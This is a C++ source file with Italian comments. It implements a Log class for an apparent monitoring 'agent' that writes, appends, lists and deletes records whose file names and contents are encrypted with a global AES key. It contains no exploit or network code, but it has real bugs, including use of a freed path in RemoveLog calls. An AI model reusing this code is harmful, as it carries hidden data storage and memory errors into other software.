#include "Log.h"

BOOL SortLogs(const LogInfo& lInfo, const LogInfo& rInfo) {
	return lInfo.date.QuadPart < rInfo.date.QuadPart;
}

Log::Log() : wName(NULL), wEncName(NULL), encryptionObj(NULL), hFile(INVALID_HANDLE_VALUE), pLogSnapshot(NULL){
	encryptionObj = new Encryption(g_AesKey, 128);
}

BOOL Log::WriteLog(UINT Id, UINT Type, UINT Seq, BYTE* pByte, UINT uLen, UINT uAdditional) {
	LogStruct LogDescription;
	SYSTEMTIME st;
	FILETIME ft;
	UINT t_seq = 0;
	UINT len = 8 + 1 + 8 + 1 + 8 + 4 + 1;	// 8 per l'id, 8 per il tipo, 8 per la sequenza, 
											// 4 per l'ext e 1 per il NULL, gli altri sono i trattini
	DWORD dwWritten;
	WCHAR *completeName = NULL;

	// Se ci e' stato detto di non scrivere nulla... Torniamo con un errore
	if(uLen == 0 && uAdditional == 0)
		return FALSE;

	if(hFile != INVALID_HANDLE_VALUE){
		CloseLog();
	}

	if(wName){
		delete[] wName;
		wName = NULL;
	}

	if(wEncName) {
		free(wEncName);
		wEncName = NULL;
	}

	t_seq = Seq;

	wName = new(std::nothrow) WCHAR[len];

	if(wName == NULL)
		return FALSE;
	
	memset(wName, 0x00, sizeof(WCHAR) * len);

	// Il file non dovrebbe esistere, ma nel caso effettuiamo un loop fino a trovare
	// un posticino per questo log.
	while(1){
		wsprintf(wName, L"%x-%x-%d%s", Id, Type, t_seq, LOG_EXTENSION);
		wEncName = encryptionObj->EncryptName(wName, g_Challenge[0]);

		if(wEncName == NULL) {
			CloseLog();
			return FALSE;
		}

		completeName = GetCurrentPath(wEncName);

		if(completeName == NULL){
			CloseLog();
			return FALSE;
		}

		hFile = CreateFile(completeName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile == INVALID_HANDLE_VALUE){
			break;
		}

		if(wEncName) {
			free(wEncName);
			wEncName = NULL;
		}

		if(completeName){
			delete[] completeName;
			completeName = NULL;
		}

		CloseHandle(hFile); // Chiudo il file e libero wEncName
		t_seq++;
	}

	if(wName) {
		delete[] wName;
		wName = NULL;
	}

	hFile = CreateFile(completeName, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	
	if(completeName){
		delete[] completeName;
		completeName = NULL;
	}

	if(hFile == INVALID_HANDLE_VALUE){
		CloseLog();
		return FALSE;
	}

	GetSystemTime(&st);
	SystemTimeToFileTime(&st, &ft);

	// Riempiamo i membri della struttura
	ZeroMemory(&LogDescription, sizeof(LogDescription));
	LogDescription.cbSize = sizeof(LogStruct);
	LogDescription.uVersion = LOG_VERSION_01;
	LogDescription.uLogType = Id; // Id dell'agente
	LogDescription.uHTimestamp = ft.dwHighDateTime;
	LogDescription.uLTimestamp = ft.dwLowDateTime;
	LogDescription.FileNameLength = WideLen(wEncName);
	LogDescription.uAdditionalData = uAdditional;
	LogDescription.FileSize = 0; // Per sicurezza lo scriviamo solo dopo la cifratura

	// Scrivi l'header nel file (escluso il nome)
	if(WriteFile(hFile, (BYTE *)&LogDescription, sizeof(LogStruct) - sizeof(LogDescription.FileName), &dwWritten, NULL) == FALSE){
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	// Scriviamo il nome del file
	if(WriteFile(hFile, (BYTE *)wEncName, LogDescription.FileNameLength, &dwWritten, NULL) == FALSE){
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	// Scriviamo i dati addizionali, se presenti (li prendiamo dal buffer pByte)
	if(LogDescription.uAdditionalData){
		if(WriteFile(hFile, (BYTE *)pByte, LogDescription.uAdditionalData, &dwWritten, NULL) == FALSE){
			CloseLog();
			RemoveLog(completeName);
			return FALSE;
		}
	}

	// Controlliamo che ci siano dati da scrivere oltre gli eventuali AdditionalData
	if(uLen == 0) {
		return TRUE;
	} else {
		pByte += LogDescription.uAdditionalData;
	}

	// Cifra i byte e scrivili
	UINT t_len = uLen;
	BYTE* encrypted = NULL;
	encrypted = encryptionObj->EncryptData(pByte, &t_len);

	if(encrypted == NULL){
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	// Scriviamo la dword che identifica la quantita' (in chiaro, unpaddato) di byte nel blocco
	if(WriteFile(hFile, (BYTE *)&uLen, sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	// E poi i dati cifrati
	if(WriteFile(hFile, encrypted, t_len, &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	// Spostiamoci di nuovo all'inizio del file ed aggiorniamo la dimensione totale,
	// calcoliamo l'offset dal primo byte
	UINT offset = 0, version = 0;

	// Leggiamo la versione di log
	SetFilePointer(hFile, sizeof(UINT), 0, FILE_BEGIN);
	ReadFile(hFile, &version, sizeof(UINT), &dwWritten, NULL);

	switch(version){
		case LOG_VERSION_01:
			offset = sizeof(UINT) * 5; // Skippiamo i primi 5 membri della struttura
			break;

		default:
			offset = sizeof(UINT) * 5;
			break;
	}

	SetFilePointer(hFile, offset, 0, FILE_BEGIN);

	// Aggiorniamo la dimensione
	offset = GetFileSize(hFile, NULL);
	if(WriteFile(hFile, (BYTE *)&offset, sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	// Lasciamo aperto l'handle al log, verra' usato dalla AppendLog()
	delete[] encrypted;
	return TRUE;
}

BOOL Log::AppendLog(BYTE* pByte, UINT uLen) {
	UINT t_seq = 0;
	UINT len = 8 + 1 + 8 + 1 + 8 + 4 + 1;	// 8 per l'id, 8 per il tipo, 8 per la sequenza, 
											// 4 per l'ext e 1 per il NULL, gli altri sono i trattini
	DWORD dwWritten;
	WCHAR *completeName = NULL;

	if(hFile == INVALID_HANDLE_VALUE)
		return FALSE;

	// Spostati alla fine del file
	SetFilePointer(hFile, 0, 0, FILE_END);

	// Cifra i byte e scrivili
	UINT t_len = uLen;
	BYTE* encrypted = NULL;
	encrypted = encryptionObj->EncryptData(pByte, &t_len);

	if(encrypted == NULL){
		CloseLog();
		return FALSE;
	}

	// Scriviamo la dword che identifica la quantita' di byte (unpaddati) nel blocco
	if(WriteFile(hFile, (BYTE *)&uLen, sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	// E poi i dati cifrati
	if(WriteFile(hFile, encrypted, t_len, &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	delete[] encrypted;

	// Spostiamoci di nuovo all'inizio del file ed aggiorniamo la dimensione totale,
	// calcoliamo l'offset dal primo byte
	UINT offset = 0, version = 0;
	LogStruct LogDescription;

	// Leggiamo la versione di log
	SetFilePointer(hFile, sizeof(LogDescription.cbSize), 0, FILE_BEGIN);
	ReadFile(hFile, &version, sizeof(UINT), &dwWritten, NULL);

	switch(version){
		case LOG_VERSION_01:
			offset = sizeof(UINT) * 5; // Skippiamo i primi 5 membri della struttura
			break;

		default:
			offset = sizeof(UINT) * 5;
			break;
	}

	SetFilePointer(hFile, offset, 0, FILE_BEGIN);

	// Aggiorniamo la dimensione
	offset = GetFileSize(hFile, NULL);
	if(WriteFile(hFile, (BYTE *)&offset, sizeof(UINT), &dwWritten, NULL) == FALSE){
		CloseLog();
		return FALSE;
	}

	return TRUE;
}

BOOL Log::CloseLog() {
	if(hFile != INVALID_HANDLE_VALUE){
		CloseHandle(hFile);
		hFile = INVALID_HANDLE_VALUE;
	}

	if(wName){
		delete[] wName;
		wName = NULL;
	}

	if(wEncName){
		free(wEncName);
		wEncName = NULL;
	}

	return TRUE;
}

BOOL Log::RemoveLog(WCHAR* wLogName) {
	BOOL ret;

	if(wLogName == NULL)
		return FALSE;

	PWCHAR wName = GetCurrentPath(wLogName);
	
	if(wName == NULL)
		return FALSE;

	ret = DeleteFile(wLogName);

	delete[] wName;
	return ret;
}

list<LogInfo>* Log::ListLogs() {
	WIN32_FIND_DATA fd;
	FILETIME ft;
	list<LogInfo> *container = NULL;
	LogInfo tLogInfo;
	HANDLE hList = INVALID_HANDLE_VALUE;
	WCHAR *ext, *search;

	// Come seed usiamo il primo byte del challenge
	ext = encryptionObj->EncryptName(LOG_EXTENSION, g_Challenge[0]);

	if(ext == NULL)
		return NULL;
	
	search = new(std::nothrow) WCHAR[1 + wcslen(LOG_EXTENSION) + 1];

	if(search == NULL){
		free(ext);
		return NULL;
	}

	memset(search, 0x00, sizeof(WCHAR) * (1 + wcslen(LOG_EXTENSION) + 1));

	search[0] = '*';
	wcscat_s(search, 1 + wcslen(LOG_EXTENSION) + 1, ext);

	PWCHAR filePath = GetCurrentPath(search);

	delete[] search;
	free(ext);

	if(filePath == NULL)
		return NULL;

	hList = FindFirstFile(filePath, &fd);

	delete[] filePath;

	if(hList == INVALID_HANDLE_VALUE)
		return NULL;

	container = new(std::nothrow) list<LogInfo>;

	if(container == NULL) {
		CloseHandle(hList);
		return NULL;
	}

	container->clear();

	WCHAR *tFileName = GetCurrentPath(fd.cFileName);
	hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hFile != INVALID_HANDLE_VALUE) {
		GetFileTime(hFile, &ft, NULL, NULL);
		CloseHandle(hFile);
		tLogInfo.date.HighPart = ft.dwHighDateTime;
		tLogInfo.date.LowPart = ft.dwLowDateTime;
		tLogInfo.pLog = tFileName;
		container->push_back(tLogInfo);
	} else {
		delete[] tFileName;
	}

	while(FindNextFile(hList, &fd)){
		tFileName = GetCurrentPath(fd.cFileName);
		hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile != INVALID_HANDLE_VALUE) { 
			GetFileTime(hFile, &ft, NULL, NULL);
			CloseHandle(hFile);
			tLogInfo.date.HighPart = ft.dwHighDateTime;
			tLogInfo.date.LowPart = ft.dwLowDateTime;
			tLogInfo.pLog = tFileName;
			container->push_back(tLogInfo);
		} else {
			delete[] tFileName;
		}
	}

	FindClose(hList);
	container->sort(SortLogs);
	return container;
}
/*
list<WCHAR*>* Log::ListLogs() {
	struct log_info_data {
		WCHAR *pLog;
		ULARGE_INTEGER date;
	};

	WIN32_FIND_DATA fd;
	FILETIME ft;
	list<log_info_data> container;
	list<WCHAR *> *logs = NULL;
	log_info_data tLogInfo;
	HANDLE hList = INVALID_HANDLE_VALUE;
	WCHAR *ext, *search, *tmp;

	logs = new(std::nothrow) list<WCHAR *>;
	logs->clear();

	if(logs == NULL)
		return NULL;

	// Come seed usiamo il primo byte del challenge
	ext = encryptionObj->EncryptName(LOG_EXTENSION, g_Challenge[0]);

	if(ext == NULL){
		logs->clear();
		delete logs;
		return NULL;
	}

	search = new(std::nothrow) WCHAR[1 + wcslen(LOG_EXTENSION) + 1];
	memset(search, 0x00, sizeof(WCHAR) * (1 + wcslen(LOG_EXTENSION) + 1));

	if(search == NULL){
		logs->clear();
		delete logs;
		free(ext);
		return NULL;
	}

	search[0] = '*';
	wcscat_s(search, 1 + wcslen(LOG_EXTENSION) + 1, ext);

	PWCHAR filePath = GetCurrentPath(search);

	if(filePath == NULL){
		logs->clear();
		delete logs;
		free(ext);
		return NULL;
	}

	hList = FindFirstFile(filePath, &fd);

	if(hList == INVALID_HANDLE_VALUE){
		int err = GetLastError();
		logs->clear();
		free(ext);
		delete[] search;
		delete[] filePath;
		return NULL;
	}

	tmp = new(std::nothrow) WCHAR[wcslen(fd.cFileName) + 1];

	if(tmp == NULL){
		logs->clear();
		free(ext);
		delete[] search;
		delete[] filePath;
		FindClose(hList);
		return NULL;
	}

	memset(tmp, 0x00, WideLen(fd.cFileName) + sizeof(WCHAR));
	memcpy(tmp, fd.cFileName, WideLen(fd.cFileName));

	container.clear();

	WCHAR *tFileName = GetCurrentPath(fd.cFileName);
	hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	delete[] tFileName;

	if(hFile != INVALID_HANDLE_VALUE) {
		GetFileTime(hFile, &ft, NULL, NULL);
		tLogInfo.date.HighPart = ft.dwHighDateTime;
		tLogInfo.date.LowPart = ft.dwLowDateTime;
		tLogInfo.pLog = tmp;
		container.push_back(tLogInfo);
		logs->push_back(tmp);
		CloseHandle(hFile);
	}

	while(FindNextFile(hList, &fd)){
		WCHAR *tFileName = GetCurrentPath(fd.cFileName);
		hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
		delete[] tFileName;

		GetFileTime(hFile, &ft, NULL, NULL);
		tLogInfo.date.HighPart = ft.dwHighDateTime;
		tLogInfo.date.LowPart = ft.dwLowDateTime;
		tLogInfo.pLog = tmp;
		container.push_back(tLogInfo);


		tmp = new(std::nothrow) WCHAR[wcslen(fd.cFileName) + 1];

		if(tmp == NULL){
			// XXX - andrebbe cancellata la memoria allocata dentro log prima di ritornare
			logs->clear();
			free(ext);
			delete[] search;
			delete[] filePath;
			FindClose(hList);
			return NULL;
		}

		memset(tmp, 0x00, WideLen(fd.cFileName) + sizeof(WCHAR));
		memcpy(tmp, fd.cFileName, WideLen(fd.cFileName));
		logs->push_back(tmp);
	}

	free(ext);
	delete[] search;
	delete[] filePath;
	FindClose(hList);

	return logs;
}*/

BOOL Log::MakeLogSnapshot() {
	list<LogInfo>::iterator iter;

	// Liberiamo il precedente snapshot se esiste
	if(pLogSnapshot != NULL){
		for(iter = pLogSnapshot->begin(); iter != pLogSnapshot->end(); iter++) {
			if((*iter).pLog) {
				delete[] (*iter).pLog;
				(*iter).pLog = NULL;
			}
		}

		pLogSnapshot->clear();
		delete pLogSnapshot;
		pLogSnapshot = NULL;
	}

	pLogSnapshot = ListLogs();

	if(pLogSnapshot == NULL)
		return FALSE;

	return TRUE;
}

list<LogInfo>* Log::GetLogSnapshot() {
	return pLogSnapshot;
}

Log::~Log() {
	list<LogInfo>::iterator iter;

	CloseLog();

	if(pLogSnapshot != NULL){
		for(iter = pLogSnapshot->begin(); iter != pLogSnapshot->end(); iter++) {
			if((*iter).pLog) {
				delete[] (*iter).pLog;
				(*iter).pLog = NULL;
			}
		}

		pLogSnapshot->clear();
		delete pLogSnapshot;
		pLogSnapshot = NULL;
	}

	if(encryptionObj)
		delete encryptionObj;
}
